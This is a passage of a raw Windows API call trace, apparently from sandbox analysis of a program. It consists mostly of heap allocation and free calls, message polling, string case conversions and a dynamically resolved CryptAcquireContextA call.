RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0252.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0252.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0252.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0252.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0252.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0252.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0252.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0252.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0252.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0252.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0252.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0252.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0252.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0252.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0252.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0252.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0252.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0252.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0252.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0252.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0252.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0252.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0252.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0252.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0252.167] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0252.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0252.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0252.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0252.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0252.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0252.168] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0252.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0252.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0252.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa00 [0252.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0252.168] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0252.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0252.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0252.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0252.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0252.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0252.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0252.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0252.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0252.168] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0252.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0252.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0252.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0252.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0252.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0252.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0252.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0252.169] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0252.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0252.169] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0252.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0252.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0252.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0252.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0252.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0252.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0252.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0252.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0252.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0252.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0252.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0252.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0252.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0252.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0252.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0252.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0252.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0252.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0252.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0252.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0252.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0252.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0252.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0252.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0252.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0252.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0252.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0252.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0252.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0252.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0252.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0252.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0252.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0252.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0252.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0252.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0252.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0252.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0252.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0252.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0252.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0252.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0252.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0252.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0252.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0252.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0252.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0252.172] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0252.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0252.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0252.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0252.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0252.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0252.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0252.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0252.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0252.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0252.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0252.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0252.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0252.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0252.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0252.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0252.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0252.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0252.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0252.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0252.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0252.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0252.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0252.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0252.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0252.174] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0252.174] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466df0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0252.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0252.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0252.174] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0252.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0252.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0252.174] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0252.174] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466df0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0252.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0252.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0252.175] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0252.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0252.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0252.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3500 | out: hHeap=0x25c0000) returned 1 [0252.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0252.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0252.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0252.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0252.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0252.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0252.175] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad31c0) returned 1 [0252.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0252.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0252.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0252.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0252.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0252.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0252.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0252.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0252.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0252.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0252.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0252.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0252.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0252.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0252.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0252.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0252.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0252.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0252.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0252.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0252.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0252.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0252.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0252.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0252.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0252.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0252.178] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0252.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0252.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0252.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0252.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0252.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0252.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0252.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0252.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0252.179] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0252.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0252.179] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0252.179] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0252.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0252.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0252.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0252.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0252.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0252.180] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0252.180] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.180] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0252.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0252.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0252.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0252.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0252.180] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.180] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.180] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.181] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0252.181] RtlAllocateHeap 